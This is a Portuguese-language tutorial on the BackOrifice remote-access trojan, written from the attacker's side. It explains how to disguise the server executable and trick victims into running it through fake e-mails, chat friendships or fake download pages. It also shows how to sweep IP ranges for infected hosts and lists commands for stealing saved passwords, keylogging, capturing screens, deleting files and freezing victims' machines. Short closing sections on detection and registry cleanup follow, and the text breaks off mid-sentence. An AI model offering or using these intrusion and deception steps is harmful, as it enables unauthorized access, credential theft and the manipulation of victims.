Invadindo BackOrifice

BackOriffice Parte I - O Que é o BackOrifice Parte II - Arquivos Parte III - Encontrando Vítimas Parte IV - Infectando novas vítimas Parte V - Comandos - Bogui.exe Parte VI - Comandos - Boclient.exe Parte VII - Protegendo-se Parte VIII - Desinfectando sua máquina Parte IX - Download - BackOrifice & Aplicativos : 1. O QUE É O BACKORIFICE : O BO é um Trojah (Cavalo de Troia) que foi apresentado em Agosto de 1998 no Defcon, um encontro de especialistas de segurança e hackers, o programa foi feito pelo grupo hacker "Cult of Dead Cult" (Culto à Vaca Morta) e funciona da seguinte maneira: o arquivo servidor (nome original Boserv.exe, mas que pode ser renomeado livremente e tem 124.928 bytes) é executado em sua máquina, do outro lado um usuário usando o arquivo bogui.exe conecta-se a sua máquina usando apenas seu numero de IP sem que você saiba e a partir daí faz o que quiser, envia messageBox, transforma sua máquina em um servidor Web onde a página principal são as unidades de disco fixo que você tem, apaga, copia e envia arquivos, reboota sua máquina, copia suas senhas, e inumeras outras possibilidades de ataque que iremos ver aqui. Índice 1.1 ARQUIVOS : boserv.exe : É o servidor, este arquivo você deverá renomear, alterar o ícone e enviar para a possível vítima que deverá instala-lo para que você possa invadir. bogui.exe : É o cliente de onde você irá comandar o micro invadido. boclient.exe : É o cliente em modo texto. freeze.exe : Comprime arquivos. melt.exe : Descomprime arquivos que foram comprimidos com o freeze.exe. Índice 1.2 ENCONTRANDO VÍTIMAS : Você pode procurar vítimas por provedores inteiros usando os primeiros números do IP do provedor com a última sequencia sendo sbustituída por um asterisco, como por exemplo, num provedor onde o IP primário é 255.255.255.1 você usa o comando: sweep 255.255.255.* Você também pode usar o mesmo artifício no Bogui.exe, coloque o mesmo número 255.255.255.* no campo destinado ao IP, escolha a opção Ping Host e clique em send, os IPs que respoderem ao ping estão infectados. Uma outra maneira e usar o velho e conhecido PortScan, scaneie a porta 31337, caso isso retorne alguma resposta a máquina em questão está infectada. Índice 1.3 INFECTANDO SUAS VÍTIMAS : Para infectar sua vítima basta fazer com que ela execute o boserv.exe, caso a vítima já esteja contaminada com NetBus ou algo parecido envie para a máquina dela o Boserv.exe e execute através do próprio NetBus, caso seja a primeira contaminação renomeie o arquivo e troque seu ícone através do MicroAngelo e tente enviar amigavelment através de um endereço de e-mail falso, ou por algum Chat, entrando com outro nick e fazendo amizade, depois que tiver ganhando a confiança da vítima é só enviar, você pode também zipar um programa que a pessoa esteja pedindo junto com o boserv.exe renomeado e com outro ícone, ou coloca-lo para download numa falsa home-page temporária que você pode criar apenas com intuito de infectar determinada pessoa informando depois o endereço da página dizendo tratar-se de um novo nuke, uma proteção ou algo assim. A Vítima descobrirá que se trata do Boserv: Se a vítima já conhecer o BO irá perceber que se trata do Boserv ao executar o arquivo que irá sumir, ou caso verifique antes o tamanho do arquivo, ou se estiver com uma versão dos mais novos Antivírus sendo rodada ao executar o arquivo, não é qualquer um que vai cair nessa não... Índice 2. COMANDOS - BOGUI.EXE : Abrindo o Bogui.exe você terá os campos TARGET-HOST:PORT que é onde será colocado o IP da vítima e porta, a porta você pode deixar o valor inicial 31337. Na combobox denominada COMMAND você tem a lista de comandos possíveis, o botão SEND envia o comando e EXIT fecha o programa. Os dois campos logo abaixo só serão usados em alguns comandos e irão variar de função, a janela maior é como se fosse seu status, na parte inferior os botões clear, copy e servem respectivamente para limpar e copiar um trecho selecionado do status, você pode logar tudo que está fazendo marcando o Checkbutton LOG TO FILE e especificando logo abaixo o nome do arquivo de log. Directory create : Cria um diretório, escolha a opção Directory create e escreva no campo UNUSED (esquerdo) o nome e caminho do diretório a ser criado, caso você não especifique o caminho o diretório será criado onde foi instalado o servidor BO. Clique em Send Directory list : Lista diretórios, escolha a opção Directory list, escreva em Directory Location o caminho do diretório. Clique em Send Directory remove : Remove diretório do mesmo modo que se cria em Directory Create. Escolha a opção Directory remove escreva o caminho do diretório no campo UNUSED (da esquerda) e clique em Send. File Copy : Copia arquivos, escolha esta opção, escreva o nome e caminho do arquivo a ser copiado em SOURCE FILENAME e o nome e caminho da cópia em TARGET FILENAME clique em Send. File delete : Deleta Arquivos, escreva no campo FILENAME o caminho e nome do arquivo a ser deletado e clique em SEND, não abuse desta opção. File find : Localiza arquivos, escreva em FILE MASK o nome do arquivo a ser procurado, e em SEARCH PATH ROOT o path onde procurar (geralmente use C:\) File view : Visualiza arquivos de texto, escreva em FILENAME o caminho e nome do arquivo a ser visualizado, clique em SEND e o arquivo será visualizado na janela de status (a janela maior do bogui) HTTP Disable : Desativa o servidor Web que é ativado pelo próprio BO no comando HTTP Enable. HTTP Enable : Transforma a máquina atacada em um servidor Web, escolha a opção HTTP Enable, ponha em PORT a porta (use 80), e em Root coloque o diretório que servirá como página inicial (deixe em branco e tenha acesso aos drivers de disco fixos).Depois clique em Send, no seu browser coloque o endereço: http://127.0.0.1:90 onde 127.0.0.1 deve ser substituído pelo IP da vítima, e 90 pela porta, caso você tenha deixado o valor da porta como 80 não só será necessário o IP. depois é só navegar normalmente, fazendo downloads e Uploads através do botão UpLoad file pelo seu Browser. Keylog Begin : Começa a logar tudo que a vítima digitar em um arquivo que você deve especificar o nome e o caminho no campo LOG FILENAME. Keylog End : Para de logar. MM Capture screen : Captura a tela da vítima (como o Print screen), escolha esta opção, escreva em BITMAP FILENAME o nome do arquivo .bmp a ser gravado com a tela da vítima, clique em Send. MM Play sound : Toca na máquina invadida um som WAV existente no HD, escreva o nome e caminho do arquivo a ser tocado em WAVE FILENAME. MM Ping host : Dá um ping na máquina infectada na porta do BO, o ping só é respondido se a máquina realmente estiver infectada, usado para descobrir máquinas infectadas. Use asteriscos para dar Ping em provedores inteiros e achar pessoas contaminadas. System Dialogbox : Envia uma MessageBox (cixa de mensagem) á vítima, escreva em TEXTO o texto da mensagem, e em TITLE coloque o título. System Info : Recolhe informações sobre o sistema, usuário, processador, sistema operacional, quantidade de memoria disponível e em uso, unidades de disco fixo, espaço utilizado no HD e espaço livre, etc. Escolha a opção system Info e clique em SEND System lockup : Trava totalmente (congela) o sistema da vítima. escolha a opção system lockup e clique em SEND. System passwords : Te dá todas as senhas gravadas da vítima, escolha a opção System Passwords, clique em SENd e as senhas serão mostradas na janela maior. System reboot : Reboota o sistema, apenas escolha esta opção e clique em send. Índice 2.1 COMANDOS - BOCLIENT.EXE : BO Commands : host : Se conecta ao IP especificado, o IP ao qual você estiver conectado aparecerá no prompt ping : Pinga o IP ao qual você está conectado. sweep : Rastreia todos IPs um provedor em busca de pessoas infectadas, ex.: para procurar pessoas infectadas no provedor cujo IP é 255.255.255.1 escreva sweep 255.255.255.* status : Mostra o status da sua conexão, Host ao qual está conectado, porta, diretório corrente. File Commands : Totalmente iguais ao do DOS dir : Lista arquivos no diretório corrente do computador ao qual você está conectado. del : Deleta um arquivos, digite: del c:\diretorio\nome-do-arquivo-a-ser-deletado.ext copy : Copia arquivos, digite: copy c:\diretorio\arquivo-a-ser-copiado.ext c:\outroiretorio\copia.ext ren : Renomeia arquivos, digite: ren nome-do-arquivo.ext novo-nome.ext find : Localiza arquivos, digite: find C:\diretorio\arquivo.ext freeze : Comprime arquivos, digite: freeze arquivo.ext arquivo-comprimido.ext melt : Descomprime arquivos, digite: melt arquivo-comprimido.ext arquivo.ext view : Visualiza arquivos, digite: view c:\diretorio\arquivo.txt Directory Comands : Também iguais ao DOS cd : Entra em um diretório, digite: cd windows rd : Remove um diretório, digite: rd c:\windows md : Cria um diretório, digite: md c:\novo-diretorio System Commands: info : Recolhe informações sobre o sistema, usuário, processador, sistema operacional, quantidade de memoria disponível e em uso, unidades de disco fixo, espaço utilizado no HD e espaço livre, etc. Digite: info passes : Mostra todas as senhas gravadas da vítima, digite: passes dialog : Envia uma MessageBox, digite: dialog "Mensagem" "Título" keylog : Loga em um arquivo especificado por você tudo que for escrito pela vítima, digite: keylog c:\diretório\arquivo-de-log.log keylog stop : Para de logar o que a vítima escreve, digite: keylog off reboot : Reinicia a máquina da vítima, digite: reboot httpon : Transforma em um servidor http o computador da vítima, digite: httpon 80 C:\ onde 80 é a porta e C:\ será a "página inicial" depois basta abrir em seu browser o ip da vítima antecepdido de http:// httpoff : Desativa o servidor http, digite: httpoff lockup : Trava totalmente a máquina da vítima, digite: lockup capscreen : Captura a tela, digite: capscreen c:\diretório\tela.bmp sound : Toca na máquina da vítima uma WAV, digite: sound c:\windows\media\arquivo.wav Índice 3. PROTEGENDO-SE : Atualmente os antivírus mais novos como por exemplo o VírusSCan v4.0.1 além de detectar e remover vírus também já detectam e até removem algunss Trojahs como BO, tenha sempre o antivírus mais recente instalado em sua máquina e mantenha-o ativo durante suas navegações pela web. Você deve também sempre que notar algo estranho e desconfiar de atitudes estranhas e involuntárias de sua máquina abrir o prompt do DOS e digitar o seguinte comando: netstat -an | find 31337 Se a resposta não demonstrar nada de anormal tudo bem, mas se a resposta for algo parecido com: TCP : 31337 LISTENING Sinal de que o dono do IP que aparece no lugar de está em sua máquina pelo BO, livre-se dele pelos provessos ensinados aqui. Índice 3.1 DESINFECTANDO SUA MÁQUINA : Clique no menu Iniciar (Start) vá até EXECUTAR(Run), escreva Regedit e clique em Ok, isso irá abrir o editor de registros do windows, entre em Hkey_Local_Machine\Software\Microsoft\Windows\CurrentVersion e verifique dentro de Run, RunServices, RunOnce, RunServicesOnce, qualquer caminho que leve para algo como " .exe" "exe~1.exe" ou algo desse tipo com nomes bem esquisitos clique com o botão direito e clique em Apagar tendo muito cuidado com o que faz, pois caso ocê delete uma chave essencial ao sistema pode ocorrer um sério problema com seu rWindows. Outro passo é Procurar pelos arquivos "windll.dll" e " .exe" que no DOS aparece com o nome "exe~1" geralmente e